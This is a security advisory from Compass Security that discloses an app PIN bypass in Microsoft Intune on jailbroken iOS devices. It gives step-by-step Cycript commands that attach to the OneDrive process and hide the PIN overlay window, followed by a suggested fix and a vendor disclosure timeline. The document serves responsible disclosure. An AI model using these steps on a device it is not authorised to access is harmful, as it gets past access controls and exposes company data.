#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Microsoft Intune [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2017-027
# Subject:  App PIN Bypass
# Risk:     Medium
# Effect:   Locally exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:     31.08.2017
#
#############################################################

Introduction:
-------------
Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1]

Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN.


Technical Description
---------------------
Microsoft Intune supports protection policies such as requiring a PIN to access a managed app. In the current implementation however, the app PIN is used to show and hide an overlay screen, restricting access to the files using the UI only.

Therefore, if the device is jailbroken, a simple Cycript script can be written to hide the overlay and use the UI to access all stored files.

To bypass the PIN, one needs to find the app's process ID (PID):
# ps aux | grep OneDrive
mobile    2086   1.2  4.9  1287904 100480   ??  Ss   11:06AM   0:05.59 /var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive

Attach to the app's process using Cycript and list the current view's details:
# cycript -p 2086
cy# UIApp.keyWindow.recursiveDescription().toString()
<CMARAppRestrictionsWindow: 0x105088e00; baseClass = UIWindow; frame = (0 0; 768 1024); gestureRecognizers = <NSArray: 0x17045b630>; layer = <UIWindowLayer: 0x170228180>>
   | <UITransitionView: 0x1050aab80; frame = (0 0; 768 1024); autoresize = W+H; layer = <CALayer: 0x1702301a0>>
   |    | [CUT BY COMPASS]
   |    |    |    | <UIButtonLabel: 0x1050ad1a0; frame = (299.5 6.5; 170.5 27.5); text = 'Forgot your PIN?'; opaque = NO; userInteractionEnabled = NO; layer = <_UILabelLayer: 0x170295950>>

Now, the overlay window can be hidden:
cy# [#0x105088e00 setHidden: YES]

The above command will lead to the PIN request window to be hidden, hence, granting access to the files using the mobile app UI.


Workaround / Fix:
-----------------
The PIN protection mechanism should be revisited. One solution would be, to encrypt all documents using a key derived from the user's PIN, hence rendering a simple Cycript bypass code useless.

Furthermore, the app should verify whether the user's device is jailbroken, and if a jailbreak is detected, all managed apps and their data should be wiped from the device.


Timeline:
---------
2017-08-22:     Discovery by Stephan Sekula
2017-09-17:     Initial vendor notification
2017-09-18:     Initial vendor response
2017-10-04:     Asking vendor for an update
2017-10-04:     Vendor replies that engineers are working on reproducing the issue
2017-11-01      Asking vendor for an update
2017-11-02      Vendor replies that the root cause is a vulnerability in iOS.
                Case is marked as won't fix.
2018-02-13      Public disclosure


References:
-----------
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune